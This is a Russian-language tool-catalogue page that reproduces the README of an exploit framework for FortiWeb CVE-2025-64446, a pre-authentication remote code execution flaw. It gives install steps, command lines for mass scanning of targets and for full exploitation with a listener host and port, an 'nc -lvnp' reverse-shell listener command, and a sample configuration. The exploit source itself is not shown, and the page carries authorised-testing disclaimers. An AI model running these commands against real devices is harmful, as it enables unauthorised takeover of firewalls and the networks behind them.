Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — Инструмент для исследования безопасности уязвимости FortiWeb CVE-2025-64446. Автоматизированная платформа эксплуатации с расширенным логированием, метриками в реальном времени, отладкой через прокси и профессиональной отчетностью. Включает логику повторов, многопоточность и настраиваемые параметры. Только для авторизованного тестирования безопасности. CVSS 9.8 Critical. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

Репозиторий
142 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Инструмент для исследования безопасности уязвимости FortiWeb CVE-2025-64446. Автоматизированная платформа эксплуатации с расширенным логированием, метриками в реальном времени, отладкой через прокси и профессиональной отчетностью. Включает логику повторов, многопоточность и настраиваемые параметры. Только для авторизованного тестирования безопасности. CVSS 9.8 Critical.

Поделиться

FortiWeb CVE-2025-64446 RCE Эксплойт

Python License CVSS CVE Status Version

Профессиональный фреймворк для исследований в области безопасности и оценки уязвимостей

Установка · Быстрый старт · Использование · Архитектура · Справочник CLI · Отказ от ответственности


Обзор

FortiWeb Research Tool — это Python-фреймворк для оценки, предназначенный для авторизованного обнаружения и анализа CVE-2025-64446 — критической проблемы удалённого выполнения кода до аутентификации, затрагивающей межсетевые экраны веб-приложений FortiWeb.

АтрибутДетали
АвторSudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8 (Критический)
КлассОбход аутентификации + обход пути → произвольная загрузка файлов → RCE
Затронутые версииСборки до 7.6.7 / 7.8.7 / 8.0.2 (сверьтесь с официальным бюллетенем)
УстранениеОбновитесь до исправленной версии FortiWeb
ЯзыкPython 3.7+
Точка входаexploit.py

Ключевые возможности

РежимФлагиНазначение
Обнаружение--detect-onlyНе эксплуатационные индикаторы уязвимости
Безопасный / только чтение--safe-modeПропуск шагов эксплуатации, изменяющих состояние
Массовое сканирование--targets + --scan-modeПараллельная оценка нескольких целей
Эксплуатация--target + --lhostКонтролируемая цепочка только в авторизованных лабораториях
Пробный запуск--dry-runПроверка процесса без применения изменений
Отчётность--output-dirОтчёты о тестировании в форматах JSON + HTML

Сводка по уязвимости

ПолеЗначение
CVE IDCVE-2025-64446
Оценка CVSS9.8 (Критический)
ВоздействиеПолная компрометация системы при успешной эксплуатации
ИсправлениеОбновитесь до 7.6.7, 7.8.7, 8.0.2 или более поздней версии

Перед определением границ тестирования всегда сверяйте затронутые и исправленные версии с Fortinet PSIRT.


📸 Скриншоты

ИспользованиеРезультаты сканирования
Панель управленияРезультаты сканирования
HTML-вывод
Вывод терминала

Установка

git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

Зависимости

ПакетРоль
requests, urllib3HTTP-клиент
rich, colorama, tqdmТерминальный интерфейс и индикаторы прогресса
pyyamlЗагрузка config.yaml

Опционально (для разработки): pytest, black, flake8, mypy, python-dotenv — см. requirements.txt.


Быстрый старт

# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

Примечание: Для режима эксплуатации требуется --lhost. Используйте --detect-only или --safe-mode, если вы не планируете запускать полную цепочку.


Руководство по использованию

Режим обнаружения

python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

Режим обнаружения оценивает доступность цели, признаки версии, экспонирование API, индикаторы обхода пути, сигналы обхода аутентификации и доступность конечной точки загрузки. На основе этих индикаторов риск классифицируется как критический / высокий / средний / низкий.

Массовое сканирование

cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

ScannerManager запускает рабочие процессы FortiWebScanner через пул потоков, выводит сводную таблицу Rich и записывает scan_report.json / scan_report.html.

Режим эксплуатации (только авторизованные лаборатории)

# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

Файл конфигурации

# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

Флаги CLI переопределяют значения, загруженные из YAML.


Архитектура

exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
КомпонентОтветственность
FortiWebScannerПроверки доступности, версии и индикаторов CVE
ScannerManagerПараллельные сканирования, сводки JSON/HTML, сводная таблица
FortiWebExploitСессия на основе конфигурации, повторные попытки, метрики, отчёты, опциональный путь эксплуатации
LogManagerСтруктурированное журналирование в файлы и цветная консоль

Общий процесс для одной цели:

Скачать инструмент